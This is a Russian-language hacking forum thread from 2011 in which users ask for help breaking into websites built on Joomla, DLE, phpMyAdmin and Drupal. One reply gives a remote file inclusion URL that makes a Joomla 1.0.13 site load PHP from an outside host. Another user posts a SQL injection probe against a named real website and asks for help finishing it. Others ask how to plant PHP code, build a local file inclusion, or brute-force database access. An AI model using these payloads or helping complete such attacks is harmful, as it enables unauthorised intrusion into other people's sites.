HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #331  
Старый 19.09.2011, 03:04
Юго
Guest
Сообщений: n/a
Провел на форуме:
13201

Репутация: 17
По умолчанию

Цитата:
Сообщение от Severyna  
Severyna said:
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
exploit:

http://joomla/index.php?mosConfig_absolute_path=http://site.ru/php.txt

Хотя уязвимости джумлы больше зависят от компонентов которые в ней установлены чем от версии.

Попробуй в компонентах баги поищи
 
Ответить с цитированием

  #332  
Старый 23.09.2011, 21:50
TimKim
Guest
Сообщений: n/a
Провел на форуме:
345

Репутация: 0
По умолчанию

http://tosnoshield.ru

http://tosnoshield.ru//index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='2

Можете помочь скуль доделать?
 
Ответить с цитированием

  #333  
Старый 24.09.2011, 01:12
S-J
Guest
Сообщений: n/a
Провел на форуме:
22681

Репутация: 0
По умолчанию

Подскажите как можно вставить сторонний PHP код в джумлу имея ФТП с полными правами + доступ к БД..

пробовал через БД в модули сунуть но отображается просто как текст а не как пхп код...

с инклудами в пхп файлы тоже не получается, ошибки выдает после инклуда, наверное не правильно инклуд делаю хотя тут хз, если можно как то инклудить то подскажите правильный инклуд в файлы.
 
Ответить с цитированием

  #334  
Старый 30.09.2011, 00:22
~{OmRus}~
Guest
Сообщений: n/a
Провел на форуме:
8471

Репутация: 1
По умолчанию

Как узнавать дижок сайта , и версию?
 
Ответить с цитированием

  #335  
Старый 30.10.2011, 22:36
=strelok=
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

подскажите какие уязвимости есть в phpmyadmin 3.4.3.1 если можно поподробнее что можно придумать....
 
Ответить с цитированием

  #336  
Старый 30.10.2011, 22:43
=strelok=
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от ~{OmRus}~  
~{OmRus}~ said:
Как узнавать дижок сайта , и версию?
/showthread.php?t=141298

/showthread.php?t=231084
 
Ответить с цитированием

  #337  
Старый 21.11.2011, 19:32
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422

Репутация: 0
По умолчанию

Здравствуйте. Нарвался на старую уязвимость в Dle , версии 8.2 . Почитав форум и просмотрев видео не смог понять как именно сформировать LFI. Дошёл только до вывода раскрытия путей:



Скажите - можно ли что-нибудь ещё сделать? Либо это предел? Прошу помочь, если не сложно.
 
Ответить с цитированием

  #338  
Старый 22.11.2011, 14:30
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Aniweste  
Aniweste said:
Здравствуйте. Нарвался на старую уязвимость в Dle , версии 8.2 . Почитав форум и просмотрев видео не смог понять как именно сформировать LFI. Дошёл только до вывода раскрытия путей:

Скажите - можно ли что-нибудь ещё сделать? Либо это предел? Прошу помочь, если не сложно.
Сам по себе вывод путей ничего не даёт, кроме абсолютного пути для возможного шелла.
 
Ответить с цитированием

  #339  
Старый 01.12.2011, 01:12
medoxx
Guest
Сообщений: n/a
Провел на форуме:
2353

Репутация: 0
По умолчанию

Drupal

Детали: сайт на drupal 5.6/7, install.php в свободном доступе, имя базы данных и пользователь - известны.

Вопрос: Можно задействовать только брутфорс mysql или же есть другой вариант получить доступ?

Пожалуйста, по существу...
 
Ответить с цитированием

  #340  
Старый 04.12.2011, 23:37
medoxx
Guest
Сообщений: n/a
Провел на форуме:
2353

Репутация: 0
По умолчанию

Цитата:
Сообщение от medoxx  
medoxx said:
Детали: сайт на drupal 5.6/7, install.php в свободном доступе, имя базы данных и пользователь - известны.
Вопрос: Можно задействовать только брутфорс mysql или же есть другой вариант получить доступ?
Пожалуйста, по существу...
АУУУУ ЕСТЬ КТО ЖИВОЙ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ